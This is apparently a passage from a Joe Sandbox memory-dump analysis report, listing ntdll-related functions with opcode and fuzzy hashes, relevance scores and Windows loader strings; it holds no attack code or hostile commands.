                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-2558761708
                                                                                                                      • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                                                                                      • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                                                                                                      • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                                                                                      • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                                                                                                      Function 011420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                                                                                      • LdrpInitializationFailure, xrefs: 011420FA
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                                                                                      • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                                                                                                      • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                                                                                      • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                                                                                                      Function 010D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                                                                                      • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                                                                                                      • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                                                                                      • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                                                                                                      Function 010CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrResSearchResource Exit, xrefs: 010CAA25
                                                                                                                      • LdrResSearchResource Enter, xrefs: 010CAA13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                      • API String ID: 0-4066393604
                                                                                                                      • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                                                                                      • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                                                                                                      • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                                                                                      • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                                                                                                      Function 0118A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                                                                                                      Function 0113E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: e8d613c058a5c360aa6f26aa118e843693bfcf015d3ca7dad46199a3b750bc1f
                                                                                                                      • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                                                                                                      • Opcode Fuzzy Hash: e8d613c058a5c360aa6f26aa118e843693bfcf015d3ca7dad46199a3b750bc1f
                                                                                                                      • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                                                                                                      Function 011643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$MUI
                                                                                                                      • API String ID: 0-17815947
                                                                                                                      • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                                                                                      • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                                                                                                      • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                                                                                      • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                                                                                                      Function 010C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                                                                                      • kLsE, xrefs: 010C0540
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 0-2547482624
                                                                                                                      • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                                                                                      • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                                                                                                      • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                                                                                      • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                                                                                                      Function 010CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                                                                                      • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                                                                                                      • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                                                                                      • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                                                                                                      Function 010FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                      • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                                                                                      • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                                                                                                      • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                                                                                      • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                                                                                                      Function 010CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                                                                                      • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                                                                                                      • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                                                                                      • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                                                                                                      Function 01146420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                                                                                      • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                                                                                                      • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                                                                                      • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                                                                                                      Function 0116E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                                                                                      • Instruction ID: 9f8efd8473782b6ea7cabff0f265f7f4bb813e642570d9ac22ee0ddc6910a648
                                                                                                                      • Opcode Fuzzy Hash: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                                                                                      • Instruction Fuzzy Hash: CC91C075A02209AEDB2AEBA5CC44FEFBB7EEF44740F010129F600A7250DB769911CB91
                                                                                                                      Function 010FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                                      • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                                                                                                      • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                                      • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                                                                                                      Function 01164978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .mui
                                                                                                                      • API String ID: 0-1199573805
                                                                                                                      • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                                      • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                                                                                                      • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                                      • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                                                                                                      Function 010DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: 052495e17f7b3c044cc8314b616fd4d6129037aec3bb99ce23510da8969668b5
                                                                                                                      • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                                                                                                      • Opcode Fuzzy Hash: 052495e17f7b3c044cc8314b616fd4d6129037aec3bb99ce23510da8969668b5
                                                                                                                      • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                                                                                                      Function 0113C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      • API String ID: 0-2202222882
                                                                                                                      • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                                                                                      • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                                                                                                      • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                                                                                      • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                                                                                                      Function 01156B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                                                                                      • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                                                                                                      • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                                                                                      • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                                                                                                      Function 0113CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryName
                                                                                                                      • API String ID: 0-215506332
                                                                                                                      • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                                                                                      • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                                                                                                      • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                                                                                      • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                                                                                                      Function 0114892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                      • API String ID: 0-702105204
                                                                                                                      • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                                                                                      • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                                                                                                      • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                                                                                      • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                                                                                                      Function 01162000 Relevance: .8, Instructions: 757COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                                                                                      • Instruction ID: 8577386e80d39f9c20ac103bde51bb56b125614b9f567ae5bfdb2c227e7857ed
                                                                                                                      • Opcode Fuzzy Hash: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                                                                                      • Instruction Fuzzy Hash: E042D3726083418FD72DCF68C890A6BBBEDBF98344F08492DFA8297250D776D855CB52
                                                                                                                      Function 01158158 Relevance: .6, Instructions: 617COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                                                                                      • Instruction ID: d2d816ac356c10d0cbd6d0e3628a7f49c0efa97e93ad366dfe22f6b2cb58af1f
                                                                                                                      • Opcode Fuzzy Hash: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                                                                                      • Instruction Fuzzy Hash: 28425F75E10219CFEB69CF6AC841BADBBF5BF48300F148099E999EB242D7349981CF50
                                                                                                                      Function 010D2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                                                                                      • Instruction ID: 455f228e57c7c9f7d7138e442dfc08df34fa312ed0441b2609d4a40131e8e25c
                                                                                                                      • Opcode Fuzzy Hash: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                                                                                      • Instruction Fuzzy Hash: DA32DE70A007658FEB2DCF69C8447BEBBF2BF84304F24411DD9969B285DB75A862CB50
                                                                                                                      Function 0116A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                                                                                      • Instruction ID: e43e73ef3c5ac9072131184fbfed59b86dd4aee8e763913c270d8bf738f93453
                                                                                                                      • Opcode Fuzzy Hash: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                                                                                      • Instruction Fuzzy Hash: B222D4702046618FE72DCF2DE490372BBF9AF45304F098459D9969F286D737E862CB61
                                                                                                                      Function 010C6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                                                                                      • Instruction ID: bbb48cb9698bb9d3b53bd70429b14b830745d5b5c8312fa43f0adda341880b1f
                                                                                                                      • Opcode Fuzzy Hash: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                                                                                      • Instruction Fuzzy Hash: 6A329C70A04215DFDB29CF68C480AAEBBF2FF48710F24456EE995AB391D731A851CF90
                                                                                                                      Function 010E4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                      • Instruction ID: 4ad29277baf7fad50c0ef3383d6727afdd93d276d1d78c6d643163e84744938e
                                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                      • Instruction Fuzzy Hash: 64F19F71E0421A9FDF19DF9AC884BAEBBF5AF48710F048169E985EB340E775D841CB60
                                                                                                                      Function 0115892B Relevance: .4, Instructions: 386COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
